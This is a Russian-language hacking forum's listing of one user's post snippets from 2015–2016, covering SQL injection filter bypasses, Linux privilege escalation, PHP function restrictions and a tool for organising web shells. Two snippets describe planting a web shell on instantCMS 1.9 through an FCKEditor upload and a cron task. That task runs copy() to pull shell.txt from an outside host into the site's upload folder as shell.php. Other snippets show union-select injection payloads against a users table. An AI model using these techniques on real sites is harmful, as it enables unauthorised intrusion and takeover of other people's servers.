Раздел: Web-среда/Web-applications
06.07.2016, 08:04
|
|
Ответов: 3,618
Просмотров: 3,208,221
Есть фильтр на наличие в запросе...
Есть фильтр на наличие в запросе information_schema. Угадать названия таблиц не получается (префикс или еще какие-то фильтры?). Без использования information_schema узнать названия таблиц/колонок...
|
|
Раздел: Повышение привилегий/Privilege escalation
16.06.2016, 17:45
|
|
Ответов: 1,219
Просмотров: 1,134,272
|
|
Раздел: Повышение привилегий/Privilege escalation
16.06.2016, 07:54
|
|
Ответов: 1,219
Просмотров: 1,134,272
Есть сервер
uname -a
Linux servername...
Есть сервер
uname -a
Linux servername 3.2.0-4-amd64 #1 SMP Debian 3.2.73-2+deb7u3 x86_64 GNU/Linux
cat /etc/issue
Debian GNU/Linux 8 \n \l
Директория bin доступна на запись. Как-то можно...
|
|
Раздел: Web-среда/Web-applications
01.06.2016, 19:15
|
|
Ответов: 3,618
Просмотров: 3,208,221
Я вот не понимаю: судя по ответу - обычный sql...
Я вот не понимаю: судя по ответу - обычный sql запрос без всяких подзапросов и прочих извратов.
SELECT * FROM table_name WHERE id=91005
Через order by подбираю количество стобцов - один (Unknown...
|
|
Раздел: Web-среда/Web-applications
01.06.2016, 17:59
|
|
Ответов: 3,618
Просмотров: 3,208,221
|
|
Раздел: Оффтоп/Offtopic
12.02.2016, 12:25
|
|
Ответов: 2
Просмотров: 7,972
Shellorg
В ходе изучения пхп, написал небольшой органайзер шеллов. Ранее использовал обычный экселевский файл, но это как-то не комильфо. Функционал пока небольшой:
- список шеллов
- комментарии к каждому...
|
|
Раздел: Web development
31.12.2015, 15:45
|
|
Ответов: 12
Просмотров: 26,184
http://pastebin.com/RvVRRu5v
Скрипт на пхп,...
http://pastebin.com/RvVRRu5v
Скрипт на пхп, исключительно в целях самообучения.
Веб-версия, не для командной строки, совместима с win/nix. Тестил на Денвере и VPS.
Немного не соответствует...
|
|
Раздел: Оффтоп/Offtopic
16.12.2015, 16:51
|
|
Ответов: 2
Просмотров: 7,180
|
|
Раздел: Оффтоп/Offtopic
15.12.2015, 11:24
|
|
Ответов: 2
Просмотров: 7,180
Скрипт проверки целостности файлов
В ходе изучения php написал чекер md5 сумм файлов.
Краткий faq:
- первый запуск через параметр ?create - создаем файл-слепок, где содержится основная инфа о нужных файлах (только указанные в...
|
|
Раздел: Web development
09.12.2015, 15:35
|
|
Ответов: 67
Просмотров: 94,254
|
|
Раздел: Сценарии/CMF/СMS
21.10.2015, 11:39
|
|
Ответов: 9
Просмотров: 36,984
|
|
Раздел: Сценарии/CMF/СMS
01.10.2015, 17:20
|
|
Ответов: 4
Просмотров: 14,230
Да, разобрался с этим. Чтобы отобразить...
Да, разобрался с этим. Чтобы отобразить site.com/test.txt - нужно было создать/править в общей сложности 3 файла, а пхп файл создается без проблем и вообще без привязки к Kohana. Это криво...
|
|
Раздел: Сценарии/CMF/СMS
30.09.2015, 19:03
|
|
Ответов: 4
Просмотров: 14,230
Kohana framework
Вопрос тем, кто работал с этим фреймворком. Есть сайт, нужно в корне создать обычный текстовый файл. test.txt
Создал - получаю ошибку 404. Создаю рядом php файл - все ок. Это проделки фреймоворка,...
|
|
Раздел: Форумы
30.09.2015, 00:07
|
|
Ответов: 48
Просмотров: 170,863
Очень частный случай для phpbb3. При...
Очень частный случай для phpbb3. При редактировании шаблонов код вместо
<!-- PHP --> phpinfo(); <!-- ENDPHP -->
обрезался до вида
<!-- PHP -->
Решилось использованием конструкции
<script...
|
|
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers
08.09.2015, 16:39
|
|
Ответов: 7
Просмотров: 20,041
disable_functions = addcslashes, addslashes,...
disable_functions = addcslashes, addslashes, apache_get_modules, apache_get_version, apache_getenv, apache_note, assert, base64_decode, basename, call_user_func, chdir, chmod, class_exists,...
|
|
Раздел: Сценарии/CMF/СMS
04.09.2015, 16:05
|
|
Ответов: 9
Просмотров: 36,984
|
|
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers
02.09.2015, 11:51
|
|
Ответов: 7
Просмотров: 20,041
Запрет функций php
Скрипт с обычным phpinfo();
Warning: phpinfo() has been disabled for security reasons
В терминале:
php -r 'phpinfo();' >1.txt
Получаем:
disable_functions = > no value = > no value
.htaccess...
|
|
Раздел: Web-среда/Web-applications
16.08.2015, 20:14
|
|
Ответов: 3,618
Просмотров: 3,208,221
|
|
Раздел: Web-среда/Web-applications
16.08.2015, 14:53
|
|
Ответов: 3,618
Просмотров: 3,208,221
|
|
Раздел: Web-среда/Web-applications
16.08.2015, 10:41
|
|
Ответов: 3,618
Просмотров: 3,208,221
В кроне ничего не нашел.
Еще вопрос: при...
В кроне ничего не нашел.
Еще вопрос: при запросе типа site.com/?id=1+union+select+username,2+from+users--+ идет блок на username/users, т.е. названия таблиц/колонок. Вариант с регистрами не...
|
|
Раздел: Web-среда/Web-applications
13.08.2015, 21:59
|
|
Ответов: 3,618
Просмотров: 3,208,221
|
|
Раздел: Сценарии/CMF/СMS
13.07.2015, 22:10
|
|
Ответов: 75
Просмотров: 192,889
instantCMS 1.9
Залил так: через FCKEditor заливаю файл с произвольным расширением (напр, 1.sss), в файле написал copy('http://mysite.com/shell.txt','/var/www/site/upload/shell.php');
В кроне создаю новую задачу,...
|
|
Раздел: Сценарии/CMF/СMS
13.07.2015, 22:08
|
|
Ответов: 10
Просмотров: 43,170
Залил так: через FCKEditor заливаю файл с...
Залил так: через FCKEditor заливаю файл с произвольным расширением (напр, 1.sss), в файле написал copy('http://mysite.com/shell.txt','/var/www/site/upload/shell.php');
В кроне создаю новую задачу,...
|
